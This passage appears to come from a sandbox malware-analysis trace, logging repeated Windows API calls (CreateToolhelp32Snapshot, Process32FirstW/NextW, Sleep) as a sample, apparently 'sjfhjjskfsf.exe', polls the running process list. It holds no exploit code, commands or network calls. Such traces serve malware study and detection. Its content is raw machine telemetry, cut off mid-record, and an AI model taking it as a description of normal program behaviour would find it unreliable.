th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="ONENOTEM.EXE")) returned 1 [0220.809] Process32NextW (in: hSnapshot=0x218, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x524, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0220.810] Process32NextW (in: hSnapshot=0x218, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x68c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0220.810] Process32NextW (in: hSnapshot=0x218, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x74c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sjfhjjskfsf.exe")) returned 1 [0220.810] Sleep (dwMilliseconds=0x64) [0220.921] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x21c [0220.922] Process32FirstW (in: hSnapshot=0x21c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0220.923] Process32NextW (in: hSnapshot=0x21c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0220.923] Process32NextW (in: hSnapshot=0x21c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0220.923] Process32NextW (in: hSnapshot=0x21c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0220.924] Process32NextW (in: hSnapshot=0x21c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0220.924] Process32NextW (in: hSnapshot=0x21c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0220.924] Process32NextW (in: hSnapshot=0x21c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0220.925] Process32NextW (in: hSnapshot=0x21c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0220.925] Process32NextW (in: hSnapshot=0x21c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0220.925] Process32NextW (in: hSnapshot=0x21c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x174, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0220.925] Process32NextW (in: hSnapshot=0x21c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.927] Process32NextW (in: hSnapshot=0x21c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.927] Process32NextW (in: hSnapshot=0x21c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.928] Process32NextW (in: hSnapshot=0x21c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.928] Process32NextW (in: hSnapshot=0x21c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x364, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.928] Process32NextW (in: hSnapshot=0x21c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0220.929] Process32NextW (in: hSnapshot=0x21c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.929] Process32NextW (in: hSnapshot=0x21c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.929] Process32NextW (in: hSnapshot=0x21c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x33c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0220.929] Process32NextW (in: hSnapshot=0x21c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0220.930] Process32NextW (in: hSnapshot=0x21c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0220.930] Process32NextW (in: hSnapshot=0x21c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0220.930] Process32NextW (in: hSnapshot=0x21c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.931] Process32NextW (in: hSnapshot=0x21c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="ONENOTEM.EXE")) returned 1 [0220.931] Process32NextW (in: hSnapshot=0x21c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x524, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0220.931] Process32NextW (in: hSnapshot=0x21c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x68c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0220.932] Process32NextW (in: hSnapshot=0x21c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x74c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sjfhjjskfsf.exe")) returned 1 [0220.932] Sleep (dwMilliseconds=0x64) [0221.067] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x220 [0221.068] Process32FirstW (in: hSnapshot=0x220, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0221.068] Process32NextW (in: hSnapshot=0x220, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0221.069] Process32NextW (in: hSnapshot=0x220, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0221.069] Process32NextW (in: hSnapshot=0x220, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0221.069] Process32NextW (in: hSnapshot=0x220, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0221.069] Process32NextW (in: hSnapshot=0x220, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0221.070] Process32NextW (in: hSnapshot=0x220, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0221.070] Process32NextW (in: hSnapshot=0x220, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0221.070] Process32NextW (in: hSnapshot=0x220, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0221.071] Process32NextW (in: hSnapshot=0x220, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x174, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0221.071] Process32NextW (in: hSnapshot=0x220, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.071] Process32NextW (in: hSnapshot=0x220, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.071] Process32NextW (in: hSnapshot=0x220, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.072] Process32NextW (in: hSnapshot=0x220, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.072] Process32NextW (in: hSnapshot=0x220, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x364, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.072] Process32NextW (in: hSnapshot=0x220, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0221.073] Process32NextW (in: hSnapshot=0x220, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.073] Process32NextW (in: hSnapshot=0x220, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.073] Process32NextW (in: hSnapshot=0x220, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x33c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0221.073] Process32NextW (in: hSnapshot=0x220, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0221.074] Process32NextW (in: hSnapshot=0x220, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0221.074] Process32NextW (in: hSnapshot=0x220, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0221.074] Process32NextW (in: hSnapshot=0x220, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.075] Process32NextW (in: hSnapshot=0x220, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="ONENOTEM.EXE")) returned 1 [0221.075] Process32NextW (in: hSnapshot=0x220, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x524, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0221.075] Process32NextW (in: hSnapshot=0x220, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x68c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0221.076] Process32NextW (in: hSnapshot=0x220, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x74c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sjfhjjskfsf.exe")) returned 1 [0221.076] Sleep (dwMilliseconds=0x64) [0221.176] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x224 [0221.177] Process32FirstW (in: hSnapshot=0x224, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0221.178] Process32NextW (in: hSnapshot=0x224, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0221.178] Process32NextW (in: hSnapshot=0x224, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0221.178] Process32NextW (in: hSnapshot=0x224, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0221.179] Process32NextW (in: hSnapshot=0x224, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0221.179] Process32NextW (in: hSnapshot=0x224, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0221.179] Process32NextW (in: hSnapshot=0x224, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0221.179] Process32NextW (in: hSnapshot=0x224, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0221.180] Process32NextW (in: hSnapshot=0x224, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0221.180] Process32NextW (in: hSnapshot=0x224, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x174, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0221.180] Process32NextW (in: hSnapshot=0x224, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.181] Process32NextW (in: hSnapshot=0x224, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.181] Process32NextW (in: hSnapshot=0x224, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.181] Process32NextW (in: hSnapshot=0x224, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.181] Process32NextW (in: hSnapshot=0x224, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x364, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.182] Process32NextW (in: hSnapshot=0x224, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0221.182] Process32NextW (in: hSnapshot=0x224, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.182] Process32NextW (in: hSnapshot=0x224, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.183] Process32NextW (in: hSnapshot=0x224, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x33c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0221.183] Process32NextW (in: hSnapshot=0x224, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0221.183] Process32NextW (in: hSnapshot=0x224, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0221.183] Process32NextW (in: hSnapshot=0x224, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0221.184] Process32NextW (in: hSnapshot=0x224, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.184] Process32NextW (in: hSnapshot=0x224, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="ONENOTEM.EXE")) returned 1 [0221.184] Process32NextW (in: hSnapshot=0x224, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, 